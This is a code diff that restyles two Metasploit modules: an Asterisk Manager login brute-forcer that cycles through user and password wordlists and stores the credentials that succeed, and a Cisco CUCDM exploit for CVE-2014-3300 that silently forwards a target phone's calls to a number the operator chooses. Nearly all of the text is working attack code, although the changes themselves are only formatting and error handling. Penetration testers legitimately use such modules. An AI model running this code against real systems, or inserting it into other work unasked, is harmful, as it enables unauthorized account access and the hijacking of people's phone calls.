L-codes
diff --git a/‎modules/auxiliary/voip/asterisk_login.rb‎
Lines changed: 78 additions & 69 deletions b/‎modules/auxiliary/voip/asterisk_login.rb‎
Lines changed: 78 additions & 69 deletions
diff --git a/‎modules/auxiliary/voip/cisco_cucdm_call_forward.rb‎
Lines changed: 68 additions & 59 deletions b/‎modules/auxiliary/voip/cisco_cucdm_call_forward.rb‎
Lines changed: 68 additions & 59 deletions
@@ -9,43 +9,50 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Report
   include Msf::Auxiliary::AuthBrute
 
-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => 'Asterisk Manager Login Utility',
-      'Description'    => %q{
-        This module attempts to authenticate to an Asterisk Manager service. Please note
-        that by default, Asterisk Call Management (port 5038) only listens locally, but
-        this can be manually configured in file /etc/asterisk/manager.conf by the admin
-        on the victim machine.
-      },
-      'Author'         =>
-        [
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Asterisk Manager Login Utility',
+        'Description' => %q{
+          This module attempts to authenticate to an Asterisk Manager service. Please note
+          that by default, Asterisk Call Management (port 5038) only listens locally, but
+          this can be manually configured in file /etc/asterisk/manager.conf by the admin
+          on the victim machine.
+        },
+        'Author' => [
           'dflah_ <dflah[at]alligatorteam.org>',
         ],
-      'References'     =>
-        [
+        'References' => [
           ['URL', 'http://www.asterisk.org/astdocs/node201.html'], # Docs for AMI
         ],
-      'License'     => MSF_LICENSE
-    ))
+        'License' => MSF_LICENSE,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [ACCOUNT_LOCKOUTS],
+          'Reliability' => []
+        }
+      )
+    )
 
     register_options(
       [
         Opt::RPORT(5038),
         OptString.new('USER_FILE',
-          [
-            false,
-            'The file that contains a list of probable users accounts.',
-            File.join(Msf::Config.install_root, 'data', 'wordlists', 'unix_users.txt')
-          ]),
+                      [
+                        false,
+                        'The file that contains a list of probable users accounts.',
+                        File.join(Msf::Config.install_root, 'data', 'wordlists', 'unix_users.txt')
+                      ]),
 
         OptString.new('PASS_FILE',
-          [
-            false,
-            'The file that contains a list of probable passwords.',
-            File.join(Msf::Config.install_root, 'data', 'wordlists', 'unix_passwords.txt')
-          ])
-      ])
+                      [
+                        false,
+                        'The file that contains a list of probable passwords.',
+                        File.join(Msf::Config.install_root, 'data', 'wordlists', 'unix_passwords.txt')
+                      ])
+      ]
+    )
   end
 
   def report_cred(opts)
@@ -75,56 +82,58 @@ def report_cred(opts)
     create_credential_login(login_data)
   end
 
-  def run_host(ip)
-    print_status("Initializing module...")
-    begin
-      each_user_pass do |user, pass|
-        do_login(user, pass)
-      end
-    rescue ::Rex::ConnectionError
-    rescue ::Exception => e
-      vprint_error("#{rhost}:#{rport} #{e.to_s} #{e.backtrace}")
+  def run_host(_ip)
+    print_status('Initializing module...')
+    each_user_pass do |user, pass|
+      do_login(user, pass)
     end
+  rescue ::Rex::ConnectionError => e
+    vprint_error("#{e.class}: #{e.message}")
+  rescue StandardError => e
+    elog("Asterisk login attempt failed", error: e)
+    vprint_error("#{e.class}: #{e.message}")
   end
 
-  def send_manager(command='')
-    begin
-      @result = ''
-      if (!@connected)
-        connect
-        @connected = true
-        select(nil,nil,nil,0.4)
-      end
-      sock.put(command)
-      @result = sock.get_once || ''
-    rescue ::Exception => err
-      print_error("Error: #{err.to_s}")
+  def send_manager(command = '')
+    @result = ''
+    if !@connected
+      connect
+      @connected = true
+      select(nil, nil, nil, 0.4)
     end
+    sock.put(command)
+    @result = sock.get_once || ''
+  rescue StandardError => e
+    print_error("Error: #{e}")
   end
 
-  def do_login(user='',pass='')
+  def do_login(user = '', pass = '')
     @connected = false
-    begin
-      send_manager(nil) # connect Only
-      if @result !~ /^Asterisk Call Manager(.*)/
-        print_error("Asterisk Manager does not appear to be running")
-        return :abort
-      else
-        vprint_status("#{rhost}:#{rport} - Trying user:'#{user}' with password:'#{pass}'")
-        cmd = "Action: Login\r\nUsername: #{user}\r\nSecret: #{pass}\r\n\r\n"
-        send_manager(cmd)
-        if /Response: Success/.match(@result)
-          print_good("User: \"#{user}\" using pass: \"#{pass}\" - can login on #{rhost}:#{rport}!")
-          report_cred(ip: rhost, port: rport, user: user, password: pass, proof: @result)
-          disconnect
-          return :next_user
-        else
-          disconnect
-          return :fail
-        end
-      end
-    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-    rescue ::Timeout::Error, ::Errno::EPIPE
+    send_manager(nil) # connect only
+
+    if @result !~ /^Asterisk Call Manager(.*)/
+      print_error('Asterisk Manager does not appear to be running')
+      return :abort
     end
+
+    vprint_status("#{rhost}:#{rport} - Trying user:'#{user}' with password:'#{pass}'")
+    cmd = "Action: Login\r\nUsername: #{user}\r\nSecret: #{pass}\r\n\r\n"
+    send_manager(cmd)
+
+    if /Response: Success/.match(@result)
+      print_good("User: \"#{user}\" using pass: \"#{pass}\" - can login on #{rhost}:#{rport}!")
+      report_cred(ip: rhost, port: rport, user: user, password: pass, proof: @result)
+      disconnect
+      return :next_user
+    end
+
+    disconnect
+    return :fail
+  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
+    vprint_error(e.message)
+    return :fail
+  rescue ::Timeout::Error, ::Errno::EPIPE => e
+    vprint_error(e.message)
+    return :fail
   end
 end
@@ -8,37 +8,44 @@
 class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::HttpClient
 
-  def initialize(info={})
-    super(update_info(info,
-      'Name'        => 'Viproy CUCDM IP Phone XML Services - Call Forwarding Tool',
-      'Description' => %q{
-        The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager
-        (CDM) 10 does not properly implement access control, which allows remote attackers to
-        modify user information. This module exploits the vulnerability to configure unauthorized
-        call forwarding.
-      },
-      'Author'      => 'fozavci',
-      'References'  =>
-        [
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Viproy CUCDM IP Phone XML Services - Call Forwarding Tool',
+        'Description' => %q{
+          The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager
+          (CDM) 10 does not properly implement access control, which allows remote attackers to
+          modify user information. This module exploits the vulnerability to configure unauthorized
+          call forwarding.
+        },
+        'Author' => 'fozavci',
+        'References' => [
           ['CVE', '2014-3300'],
           ['BID', '68331']
         ],
-      'License'     => MSF_LICENSE,
-      'Actions'     =>
-        [
+        'License' => MSF_LICENSE,
+        'Actions' => [
           [ 'Forward', { 'Description' => 'Enabling the call forwarding for the MAC address' } ],
           [ 'Info', { 'Description' => 'Retrieving the call forwarding information for the MAC address' } ]
         ],
-      'DefaultAction'  => 'Info'
-    ))
+        'DefaultAction' => 'Info',
+        'Notes' => {
+          'Stability' => [SERVICE_RESOURCE_LOSS],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
+      )
+    )
 
     register_options(
       [
         OptString.new('TARGETURI', [ true, 'Target URI for XML services', '/bvsmweb']),
-        OptString.new('MAC', [ true, 'MAC Address of target phone', '000000000000']),
+        OptString.new('MAC', [ true, 'MAC address of target phone', '000000000000']),
         OptString.new('FORWARDTO', [ true, 'Number to forward all calls', '007']),
-        OptString.new('FINTNUMBER', [ false, 'FINTNUMBER of IP Phones, required for multiple lines'])
-      ])
+        OptString.new('FINTNUMBER', [ false, 'FINTNUMBER of IP phones, required for multiple lines'])
+      ]
+    )
   end
 
   def run
@@ -52,22 +59,23 @@ def run
 
   def get_info
     uri = normalize_uri(target_uri.to_s)
-    mac = datastore["MAC"]
+    mac = datastore['MAC']
 
-    print_status("Getting fintnumbers and display names of the IP phone")
+    print_status('Getting fintnumbers and display names of the IP phone')
 
     res = send_request_cgi(
-        {
-            'uri'    => normalize_uri(uri, 'showcallfwd.cgi'),
-            'method' => 'GET',
-            'vars_get' => {
-                'device' => "SEP#{mac}"
-            }
-        })
+      {
+        'uri' => normalize_uri(uri, 'showcallfwd.cgi'),
+        'method' => 'GET',
+        'vars_get' => {
+          'device' => "SEP#{mac}"
+        }
+      }
+    )
 
     unless res && res.code == 200 && res.body && res.body.to_s =~ /fintnumber/
-      print_error("Target appears not vulnerable!")
-      print_status("#{res}")
+      print_error('Target appears not vulnerable!')
+      print_status(res.to_s)
       return []
     end
 
@@ -79,9 +87,9 @@ def get_info
 
     list.each do |lst|
       xlist = lst.get_elements('Name')
-      xlist.each {|l| lines << "#{l[0]}"}
+      xlist.each { |l| lines << (l[0]).to_s }
       xlist = lst.get_elements('URL')
-      xlist.each {|l| fint_numbers << "#{l[0].to_s.split('fintnumber=')[1]}" }
+      xlist.each { |l| fint_numbers << (l[0].to_s.split('fintnumber=')[1]).to_s }
     end
 
     lines.size.times do |i|
@@ -94,8 +102,8 @@ def get_info
   def forward_calls
     # for a specific FINTNUMBER redirection
     uri = normalize_uri(target_uri.to_s)
-    forward_to = datastore["FORWARDTO"]
-    mac = datastore["MAC"]
+    forward_to = datastore['FORWARDTO']
+    mac = datastore['MAC']
 
     if datastore['FINTNUMBER']
       fint_numbers = [datastore['FINTNUMBER']]
@@ -104,41 +112,42 @@ def forward_calls
     end
 
     if fint_numbers.empty?
-      print_error("FINTNUMBER required to forward calls")
+      print_error('FINTNUMBER required to forward calls')
       return
     end
 
     fint_numbers.each do |fintnumber|
-
       print_status("Sending call forward request for #{fintnumber}")
 
       send_request_cgi(
-          {
-              'uri'    => normalize_uri(uri, 'phonecallfwd.cgi'),
-              'method' => 'GET',
-              'vars_get' => {
-                  'cfoption'     => 'CallForwardAll',
-                  'device'       => "SEP#{mac}",
-                  'ProviderName' => 'NULL',
-                  'fintnumber'   => "#{fintnumber}",
-                  'telno1'       => "#{forward_to}"
-              }
-          })
+        {
+          'uri' => normalize_uri(uri, 'phonecallfwd.cgi'),
+          'method' => 'GET',
+          'vars_get' => {
+            'cfoption' => 'CallForwardAll',
+            'device' => "SEP#{mac}",
+            'ProviderName' => 'NULL',
+            'fintnumber' => fintnumber.to_s,
+            'telno1' => forward_to.to_s
+          }
+        }
+      )
 
       res = send_request_cgi(
-          {
-              'uri'    => normalize_uri(uri, 'showcallfwdperline.cgi'),
-              'method' => 'GET',
-              'vars_get' => {
-                  'device'     => "SEP#{mac}",
-                  'fintnumber' => "#{fintnumber}"
-              }
-          })
-
-      if res && res.body && res.body && res.body.to_s =~ /CFA/
+        {
+          'uri' => normalize_uri(uri, 'showcallfwdperline.cgi'),
+          'method' => 'GET',
+          'vars_get' => {
+            'device' => "SEP#{mac}",
+            'fintnumber' => fintnumber.to_s
+          }
+        }
+      )
+
+      if res && res.body.to_s.include?('CFA')
         print_good("Call forwarded successfully for #{fintnumber}")
       else
-        print_error("Call forward failed")
+        print_error('Call forward failed')
       end
     end
   end